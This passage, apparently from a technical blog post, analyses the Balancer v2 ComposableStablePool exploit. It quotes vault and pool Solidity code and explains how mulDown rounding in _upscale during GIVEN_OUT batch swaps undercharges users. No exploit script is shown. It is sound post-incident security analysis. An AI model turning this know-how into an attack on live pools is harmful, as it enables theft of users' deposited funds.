the vault. The vault.joinPool function will call the specific pool’s onJoinPool function (for exiting liquidity, it calls vault.exitPool and pool.onExitPool functions respectively). Below is the code for the onJoinPool / onExitPool functions. It can be seen that these two are inherited by all types of Pools, and specifically <strong>different types of Pools implement different hook functions like _onInitializePool / _onJoinPool / _onExitPool to calculate the amounts of funds flowing in and out, but BPT minting and burning happens here</strong>:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/pool-utils/contracts/BasePool.sol</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@notice</span> Vault hook for adding liquidity to a pool (including the first time, &quot;initializing&quot; the pool).</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> This function can only be called from the Vault, from `joinPool`.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">onJoinPool</span>(<span class="params"></span></span><br><span class="line"><span class="params">    bytes32 poolId,</span></span><br><span class="line"><span class="params">    address sender,</span></span><br><span class="line"><span class="params">    address recipient,</span></span><br><span class="line"><span class="params">    uint256[] memory balances,</span></span><br><span class="line"><span class="params">    uint256 lastChangeBlock,</span></span><br><span class="line"><span class="params">    uint256 protocolSwapFeePercentage,</span></span><br><span class="line"><span class="params">    bytes memory userData</span></span><br><span class="line"><span class="params"></span>) external override <span class="title function_">onlyVault</span>(poolId) <span class="title function_">returns</span> (uint256[] memory, uint256[] memory) &#123;</span><br><span class="line">    <span class="title function_">_beforeSwapJoinExit</span>();</span><br><span class="line"></span><br><span class="line">    uint256[] memory scalingFactors = <span class="title function_">_scalingFactors</span>();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="title function_">totalSupply</span>() == <span class="number">0</span>) &#123;</span><br><span class="line">        (uint256 bptAmountOut, uint256[] memory amountsIn) = <span class="title function_">_onInitializePool</span>(</span><br><span class="line">            poolId,</span><br><span class="line">            sender,</span><br><span class="line">            recipient,</span><br><span class="line">            scalingFactors,</span><br><span class="line">            userData</span><br><span class="line">        );</span><br><span class="line"></span><br><span class="line">        <span class="comment">// On initialization, we lock _getMinimumBpt() by minting it for the zero address. This BPT acts as a</span></span><br><span class="line">        <span class="comment">// minimum as it will never be burned, which reduces potential issues with rounding, and also prevents the</span></span><br><span class="line">        <span class="comment">// Pool from ever being fully drained.</span></span><br><span class="line">        <span class="title function_">_require</span>(bptAmountOut &gt;= <span class="title function_">_getMinimumBpt</span>(), <span class="title class_">Errors</span>.<span class="property">MINIMUM_BPT</span>);</span><br><span class="line">        <span class="title function_">_mintPoolTokens</span>(<span class="title function_">address</span>(<span class="number">0</span>), <span class="title function_">_getMinimumBpt</span>());</span><br><span class="line">        <span class="title function_">_mintPoolTokens</span>(recipient, bptAmountOut - <span class="title function_">_getMinimumBpt</span>());</span><br><span class="line"></span><br><span class="line">        <span class="comment">// amountsIn are amounts entering the Pool, so we round up.</span></span><br><span class="line">        <span class="title function_">_downscaleUpArray</span>(amountsIn, scalingFactors);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> (amountsIn, <span class="keyword">new</span> uint256[](balances.<span class="property">length</span>));</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="title function_">_upscaleArray</span>(balances, scalingFactors);</span><br><span class="line">        (uint256 bptAmountOut, uint256[] memory amountsIn) = <span class="title function_">_onJoinPool</span>(</span><br><span class="line">            poolId,</span><br><span class="line">            sender,</span><br><span class="line">            recipient,</span><br><span class="line">            balances,</span><br><span class="line">            lastChangeBlock,</span><br><span class="line">            <span class="title function_">inRecoveryMode</span>() ? <span class="number">0</span> : protocolSwapFeePercentage, <span class="comment">// Protocol fees are disabled while in recovery mode</span></span><br><span class="line">            scalingFactors,</span><br><span class="line">            userData</span><br><span class="line">        );</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Note we no longer use `balances` after calling `_onJoinPool`, which may mutate it.</span></span><br><span class="line"></span><br><span class="line">        <span class="title function_">_mintPoolTokens</span>(recipient, bptAmountOut);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// amountsIn are amounts entering the Pool, so we round up.</span></span><br><span class="line">        <span class="title function_">_downscaleUpArray</span>(amountsIn, scalingFactors);</span><br><span class="line"></span><br><span class="line">        <span class="comment">// This Pool ignores the `dueProtocolFees` return value, so we simply return a zeroed-out array.</span></span><br><span class="line">        <span class="keyword">return</span> (amountsIn, <span class="keyword">new</span> uint256[](balances.<span class="property">length</span>));</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@notice</span> Vault hook for removing liquidity from a pool.</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> This function can only be called from the Vault, from `exitPool`.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">onExitPool</span>(<span class="params"></span></span><br><span class="line"><span class="params">    bytes32 poolId,</span></span><br><span class="line"><span class="params">    address sender,</span></span><br><span class="line"><span class="params">    address recipient,</span></span><br><span class="line"><span class="params">    uint256[] memory balances,</span></span><br><span class="line"><span class="params">    uint256 lastChangeBlock,</span></span><br><span class="line"><span class="params">    uint256 protocolSwapFeePercentage,</span></span><br><span class="line"><span class="params">    bytes memory userData</span></span><br><span class="line"><span class="params"></span>) external override <span class="title function_">onlyVault</span>(poolId) <span class="title function_">returns</span> (uint256[] memory, uint256[] memory) &#123;</span><br><span class="line">    uint256[] memory amountsOut;</span><br><span class="line">    uint256 bptAmountIn;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// When a user calls `exitPool`, this is the first point of entry from the Vault.</span></span><br><span class="line">    <span class="comment">// We first check whether this is a Recovery Mode exit - if so, we proceed using this special lightweight exit</span></span><br><span class="line">    <span class="comment">// mechanism which avoids computing any complex values, interacting with external contracts, etc., and generally</span></span><br><span class="line">    <span class="comment">// should always work, even if the Pool&#x27;s mathematics or a dependency break down.</span></span><br><span class="line">    <span class="keyword">if</span> (userData.<span class="title function_">isRecoveryModeExitKind</span>()) &#123;</span><br><span class="line">        <span class="comment">// This exit kind is only available in Recovery Mode.</span></span><br><span class="line">        <span class="title function_">_ensureInRecoveryMode</span>();</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Note that we don&#x27;t upscale balances nor downscale amountsOut - we don&#x27;t care about scaling factors during</span></span><br><span class="line">        <span class="comment">// a recovery mode exit.</span></span><br><span class="line">        (bptAmountIn, amountsOut) = <span class="title function_">_doRecoveryModeExit</span>(balances, <span class="title function_">totalSupply</span>(), userData);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="comment">// Note that we only call this if we&#x27;re not in a recovery mode exit.</span></span><br><span class="line">        <span class="title function_">_beforeSwapJoinExit</span>();</span><br><span class="line"></span><br><span class="line">        uint256[] memory scalingFactors = <span class="title function_">_scalingFactors</span>();</span><br><span class="line">        <span class="title function_">_upscaleArray</span>(balances, scalingFactors);</span><br><span class="line"></span><br><span class="line">        (bptAmountIn, amountsOut) = <span class="title function_">_onExitPool</span>(</span><br><span class="line">            poolId,</span><br><span class="line">            sender,</span><br><span class="line">            recipient,</span><br><span class="line">            balances,</span><br><span class="line">            lastChangeBlock,</span><br><span class="line">            <span class="title function_">inRecoveryMode</span>() ? <span class="number">0</span> : protocolSwapFeePercentage, <span class="comment">// Protocol fees are disabled while in recovery mode</span></span><br><span class="line">            scalingFactors,</span><br><span class="line">            userData</span><br><span class="line">        );</span><br><span class="line"></span><br><span class="line">        <span class="comment">// amountsOut are amounts exiting the Pool, so we round down.</span></span><br><span class="line">        <span class="title function_">_downscaleDownArray</span>(amountsOut, scalingFactors);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Note we no longer use `balances` after calling `_onExitPool`, which may mutate it.</span></span><br><span class="line"></span><br><span class="line">    <span class="title function_">_burnPoolTokens</span>(sender, bptAmountIn);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// This Pool ignores the `dueProtocolFees` return value, so we simply return a zeroed-out array.</span></span><br><span class="line">    <span class="keyword">return</span> (amountsOut, <span class="keyword">new</span> uint256[](balances.<span class="property">length</span>));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p><strong>Swap Operations</strong></p><p>In Balancer, users can exchange tokens with the Vault through <code>swap</code> and <code>batchSwap</code> without directly trusting the Pool contract itself, as all security checks are performed by the Vault. <code>swap</code> is used to execute a single token exchange, while <code>batchSwap</code> can execute multiple exchanges sequentially in the same transaction and supports multihop chain exchanges.</p><p>Each swap contains a tokenIn and a tokenOut: the former is sent by the user to the Pool, and the latter is sent by the Pool to the recipient. Depending on the user’s intent, swaps are divided into two types:</p><ul><li><strong>GIVEN_IN</strong>: Fixed input amount, with the output amount calculated by the Pool through the <code>onSwap</code> hook</li><li><strong>GIVEN_OUT</strong>: Fixed output amount, also calculated by the Pool through the <code>onSwap</code> hook</li></ul><blockquote><p>Note: In batchSwap, although multiple swap operations are involved, these swap operations all share one type, meaning either all swaps are GIVEN_IN type or all are GIVEN_OUT type. This SwapKind is specified by the user when calling batchSwap through function call parameters, so there won’t be a situation where different swaps in one batchSwap have mixed Kind calculations.</p></blockquote><p>Regardless of how many exchanges are performed, the Vault will first complete all intermediate calculations and then settle the net changes of tokens in one step at the end, significantly saving gas, especially during multihop or cross-pool exchanges.</p><blockquote><p>When performing multiple token conversions in multihop (for example, TokenA/TokenB swap first, then TokenB/TokenC conversion), you can set the tokenIn amount to 0 in subsequent swaps, which will use the token amount that flowed out from the previous swap, simplifying the calculation logic so users don’t need to calculate the amount for each swap.</p></blockquote><p><strong>Note: Users are obligated to maintain the correct Swap order according to SwapKind</strong>. For example, suppose there are two swap pairs: TokenA/TokenB and TokenB/TokenC. If the user wants:</p><ol><li>To swap 100 TokenA for TokenC, they need to set:<ul><li>SwapKind to <strong>GIVEN_IN</strong></li><li>SwapSteps to <code>100 TokenA/TokenB -&gt; 0 TokenB/TokenC</code>. This means using 100 TokenA to exchange for TokenB, and using <strong>all</strong> the TokenB obtained from the exchange to exchange for TokenC (the amount for the second step TokenB/TokenC swap operation is set to 0 to indicate using the exchange result amount from the previous step).</li></ul></li><li>To swap TokenA for 100 TokenC, they need to set:<ul><li>SwapKind to <strong>GIVEN_OUT</strong></li><li>SwapSteps to <code>100 TokenB/TokenC -&gt; 0 TokenA/TokenB</code>. This means working backwards: if 100 TokenC are needed, calculate how many TokenB need to be provided, then use the calculated required TokenB amount to work backwards to determine how many TokenA need to be provided.</li></ul></li></ol><p>Since batchSwap needs to support both types of swaps, <strong>pools need to implement share calculation methods favorable to the protocol for both swap directions</strong>. The function call path is: <code>batchSwap → _swapWithPools → _swapWithPool → _processGeneralPoolSwapRequest → BaseGeneralPool.onSwap → BaseGeneralPool._swapGivenIn/_swapGivenOut → the _swapGivenIn/_swapGivenOut hook functions implemented by specific pools</code>. Among these, the <code>BaseGeneralPool._swapGivenIn/_swapGivenOut</code> functions can be overridden. ComposableStablePool overrides these two <code>_swapGivenIn/_swapGivenOut</code> functions to specifically handle BPT swap logic.</p><p>For ComposableStablePool, which is a GeneralPool, the pool balances that the vault operates on when processing swaps are the _generalPoolsBalances state variable we introduced earlier. You can quickly see how it keeps accounts from here:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/vault/contracts/Swaps.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_processGeneralPoolSwapRequest</span>(<span class="params">IPoolSwapStructs.SwapRequest memory request, IGeneralPool pool</span>)</span><br><span class="line">    private</span><br><span class="line">    <span class="title function_">returns</span> (uint256 amountCalculated)</span><br><span class="line">&#123;</span><br><span class="line">    bytes32 tokenInBalance;</span><br><span class="line">    bytes32 tokenOutBalance;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// We access both token indexes without checking existence, because we will do it manually immediately after.</span></span><br><span class="line">    <span class="title class_">EnumerableMap</span>.<span class="property">IERC20ToBytes32Map</span> storage poolBalances = _generalPoolsBalances[request.<span class="property">poolId</span>];</span><br><span class="line">    uint256 indexIn = poolBalances.<span class="title function_">unchecked_indexOf</span>(request.<span class="property">tokenIn</span>);</span><br><span class="line">    uint256 indexOut = poolBalances.<span class="title function_">unchecked_indexOf</span>(request.<span class="property">tokenOut</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (indexIn == <span class="number">0</span> || indexOut == <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="comment">// The tokens might not be registered because the Pool itself is not registered. We check this to provide a</span></span><br><span class="line">        <span class="comment">// more accurate revert reason.</span></span><br><span class="line">        <span class="title function_">_ensureRegisteredPool</span>(request.<span class="property">poolId</span>);</span><br><span class="line">        <span class="title function_">_revert</span>(<span class="title class_">Errors</span>.<span class="property">TOKEN_NOT_REGISTERED</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// EnumerableMap stores indices *plus one* to use the zero index as a sentinel value - because these are valid,</span></span><br><span class="line">    <span class="comment">// we can undo this.</span></span><br><span class="line">    indexIn -= <span class="number">1</span>;</span><br><span class="line">    indexOut -= <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">    uint256 tokenAmount = poolBalances.<span class="title function_">length</span>();</span><br><span class="line">    uint256[] memory currentBalances = <span class="keyword">new</span> uint256[](tokenAmount);</span><br><span class="line"></span><br><span class="line">    request.<span class="property">lastChangeBlock</span> = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">for</span> (uint256 i = <span class="number">0</span>; i &lt; tokenAmount; i++) &#123;</span><br><span class="line">        <span class="comment">// Because the iteration is bounded by `tokenAmount`, and no tokens are registered or deregistered here, we</span></span><br><span class="line">        <span class="comment">// know `i` is a valid token index and can use `unchecked_valueAt` to save storage reads.</span></span><br><span class="line">        bytes32 balance = poolBalances.<span class="title function_">unchecked_valueAt</span>(i);</span><br><span class="line"></span><br><span class="line">        currentBalances[i] = balance.<span class="title function_">total</span>();</span><br><span class="line">        request.<span class="property">lastChangeBlock</span> = <span class="title class_">Math</span>.<span class="title function_">max</span>(request.<span class="property">lastChangeBlock</span>, balance.<span class="title function_">lastChangeBlock</span>());</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (i == indexIn) &#123;</span><br><span class="line">            tokenInBalance = balance;</span><br><span class="line">        &#125; <span class="keyword">else</span> <span class="keyword">if</span> (i == indexOut) &#123;</span><br><span class="line">            tokenOutBalance = balance;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Perform the swap request callback and compute the new balances for &#x27;token in&#x27; and &#x27;token out&#x27; after the swap</span></span><br><span class="line">    amountCalculated = pool.<span class="title function_">onSwap</span>(request, currentBalances, indexIn, indexOut);</span><br><span class="line">    (uint256 amountIn, uint256 amountOut) = <span class="title function_">_getAmounts</span>(request.<span class="property">kind</span>, request.<span class="property">amount</span>, amountCalculated);</span><br><span class="line">    tokenInBalance = tokenInBalance.<span class="title function_">increaseCash</span>(amountIn);</span><br><span class="line">    tokenOutBalance = tokenOutBalance.<span class="title function_">decreaseCash</span>(amountOut);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Because no tokens were registered or deregistered between now or when we retrieved the indexes for</span></span><br><span class="line">    <span class="comment">// &#x27;token in&#x27; and &#x27;token out&#x27;, we can use `unchecked_setAt` to save storage reads.</span></span><br><span class="line">    poolBalances.<span class="title function_">unchecked_setAt</span>(indexIn, tokenInBalance);</span><br><span class="line">    poolBalances.<span class="title function_">unchecked_setAt</span>(indexOut, tokenOutBalance);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h2 id="III-Vulnerability-Analysis">III. Vulnerability Analysis</h2><p>Let’s see how this vulnerability is triggered. First, we need to clone the <a href="https://github.com/balancer/balancer-v2-monorepo">balancer/balancer-v2-monorepo</a> repository and checkout commit 88842344fb5f44d8ed6f8f944acd3be80627df87.</p><blockquote><p>Note: The latest version of Balancer is v3, so there is also a v3 repository on GitHub, but the vulnerability exists in the <strong>v2</strong> version, so don’t get confused. Also, this commit is the latest commit as of 2025/11/20, and the vulnerability patch still hasn’t been pushed up two weeks after the attack incident.</p></blockquote><h3 id="1-Vulnerable-Code">1. Vulnerable Code</h3><p>In the previous section, we described Balancer’s interaction flow in detail and have a relatively clear understanding of some operations and variables, so understanding this vulnerability is no longer difficult. This vulnerability is actually quite simple. When a user calls vault.batchSwap with SwapKind.GIVEN_OUT, if the swap involves ComposableStablePool and tokenIn/tokenOut is not BPT, it will actually call the base class <code>BaseGeneralPool._swapGivenOut</code> to calculate the required tokenIn amount:</p><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/pool-stable/contracts/ComposableStablePool.sol</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> Override this hook called by the base class `onSwap`, to check whether we are doing a regular swap,</span></span><br><span class="line"><span class="comment"> * or a swap involving BPT, which is equivalent to a single token join or exit. Since one of the Pool&#x27;s</span></span><br><span class="line"><span class="comment"> * tokens is the preminted BPT, we need to handle swaps where BPT is involved separately.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * At this point, the balances are unscaled. The indices and balances are coming from the Vault, so they</span></span><br><span class="line"><span class="comment"> * refer to the full set of registered tokens (including BPT).</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * If this is a swap involving BPT, call `_swapWithBpt`, which computes the amountOut using the swapFeePercentage</span></span><br><span class="line"><span class="comment"> * and charges protocol fees, in the same manner as single token join/exits. Otherwise, perform the default</span></span><br><span class="line"><span class="comment"> * processing for a regular swap.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_swapGivenOut</span>(<span class="params"></span></span><br><span class="line"><span class="params">    SwapRequest memory swapRequest,</span></span><br><span class="line"><span class="params">    uint256[] memory registeredBalances,</span></span><br><span class="line"><span class="params">    uint256 registeredIndexIn,</span></span><br><span class="line"><span class="params">    uint256 registeredIndexOut,</span></span><br><span class="line"><span class="params">    uint256[] memory scalingFactors</span></span><br><span class="line"><span class="params"></span>) internal virtual override <span class="title function_">returns</span> (uint256) &#123;</span><br><span class="line">    <span class="keyword">return</span></span><br><span class="line">        (swapRequest.<span class="property">tokenIn</span> == <span class="title class_">IERC20</span>(<span class="variable language_">this</span>) || swapRequest.<span class="property">tokenOut</span> == <span class="title class_">IERC20</span>(<span class="variable language_">this</span>))</span><br><span class="line">            ? <span class="title function_">_swapWithBpt</span>(swapRequest, registeredBalances, registeredIndexIn, registeredIndexOut, scalingFactors)</span><br><span class="line">            : <span class="variable language_">super</span>.<span class="title function_">_swapGivenOut</span>( <span class="comment">// &lt;------ [1]</span></span><br><span class="line">                swapRequest,</span><br><span class="line">                registeredBalances,</span><br><span class="line">                registeredIndexIn,</span><br><span class="line">                registeredIndexOut,</span><br><span class="line">                scalingFactors</span><br><span class="line">            );</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// pkg/pool-utils/contracts/BaseGeneralPool.sol</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_swapGivenOut</span>(<span class="params"></span></span><br><span class="line"><span class="params">    SwapRequest memory swapRequest,</span></span><br><span class="line"><span class="params">    uint256[] memory balances,</span></span><br><span class="line"><span class="params">    uint256 indexIn,</span></span><br><span class="line"><span class="params">    uint256 indexOut,</span></span><br><span class="line"><span class="params">    uint256[] memory scalingFactors</span></span><br><span class="line"><span class="params"></span>) internal virtual <span class="title function_">returns</span> (uint256) &#123;</span><br><span class="line">    <span class="title function_">_upscaleArray</span>(balances, scalingFactors);</span><br><span class="line">    swapRequest.<span class="property">amount</span> = <span class="title function_">_upscale</span>(swapRequest.<span class="property">amount</span>, scalingFactors[indexOut]); <span class="comment">// &lt;---- [2]</span></span><br><span class="line"></span><br><span class="line">    uint256 amountIn = <span class="title function_">_onSwapGivenOut</span>(swapRequest, balances, indexIn, indexOut);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// amountIn tokens are entering the Pool, so we round up.</span></span><br><span class="line">    amountIn = <span class="title function_">_downscaleUp</span>(amountIn, scalingFactors[indexIn]);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Fees are added after scaling happens, to reduce the complexity of the rounding direction analysis.</span></span><br><span class="line">    <span class="keyword">return</span> <span class="title function_">_addSwapFeeAmount</span>(amountIn);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// pkg/solidity-utils/contracts/helpers/ScalingHelpers.sol</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> Applies `scalingFactor` to `amount`, resulting in a larger or equal value depending on whether it needed</span></span><br><span class="line"><span class="comment"> * scaling or not.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_upscale</span>(<span class="params">uint256 amount, uint256 scalingFactor</span>) pure <span class="title function_">returns</span> (uint256) &#123;</span><br><span class="line">    <span class="comment">// Upscale rounding wouldn&#x27;t necessarily always go in the same direction: in a swap for example the balance of</span></span><br><span class="line">    <span class="comment">// token in should be rounded up, and that of token out rounded down. This is the only place where we round in</span></span><br><span class="line">    <span class="comment">// the same direction for all amounts, as the impact of this rounding is expected to be minimal.</span></span><br><span class="line">    <span class="keyword">return</span> <span class="title class_">FixedPoint</span>.<span class="title function_">mulDown</span>(amount, scalingFactor); <span class="comment">// &lt;----- [3]</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>From the code, we can see that even when calculating the required tokenIn amount for GivenOut, BaseGeneralPool._swapGivenOut still uses mulDown for upscaling. <strong>However, in the GivenOut context, mulDown favors users rather than the protocol</strong>, because swapRequest.amount at this point represents how many tokenOut the user needs. If the <strong>token value</strong> calculated by _upscale is set too low, it may not ensure that the user pays enough value.</p><blockquote><p>For example, for a TokenB/TokenC swap where amount = 100 means the user needs 100 tokenC, this is used to calculate how many TokenB the pool needs from the user. If the amount is reduced, then naturally the calculated amount of tokenA that needs to be transferred from the user to the vault will also decrease.</p></blockquote><p><strong>This is the actual key code of the vulnerability.</strong> However, the comments show that developers believed the impact here would be minimal (<em>the impact of this rounding is expected to be minimal</em>). So what caused this supposedly minimal impact to result in such massive token theft? This requires careful analysis of several key points. First, let’s go through the scalingFactor calculation process.</p><p>In ComposableStablePool, the calculated scalingFactor will equal the token’s current decimal <strong>multiplied by the token rate</strong>, which will result in a value with 1e18 precision, and the 1e18 precision will be removed in the final step of FixedPoint.mulDown in _upscale.</p><blockquote><p>For example, if _scalingFactor0 is 1e18 and tokenRate0 is 1.1e18, then the _scalingFactors function will calculate a result of 1.1e18.<br>Next, calling the _upscale function with a very small value as the amount parameter, for example executing _upscale(<strong>9</strong>, 1.1e18), the final calculated result will be <code>9.9e18 % 1e18 = ~~9.9~~ 9</code>. We can see that this calculation loses 0.9 in precision, which is equivalent to a 10% precision loss.</p></blockquote><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// pkg/pool-stable/contracts/ComposableStablePoolRates.sol</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@dev</span> Overrides scaling factor getter to compute the tokens&#x27; rates.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">_scalingFactors</span>(<span class="params"></span>) internal view virtual override <span class="title function_">returns</span> (uint256[] memory) &#123;</span><br><span class="line">    <span class="comment">// There is no need to check the arrays length since both are based on `_getTotalTokens`</span></span><br><span class="line">    uint256 totalTokens = <span class="title function_">_getTotalTokens</span>();</span><br><span class="line">    uint256[] memory scalingFactors = <span class="keyword">new</span> uint256[](totalTokens);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> (uint256 i = <span class="number">0</span>; i &lt; totalTokens; ++i) &#123;</span><br><span class="line">        scalingFactors[i] = <span class="title 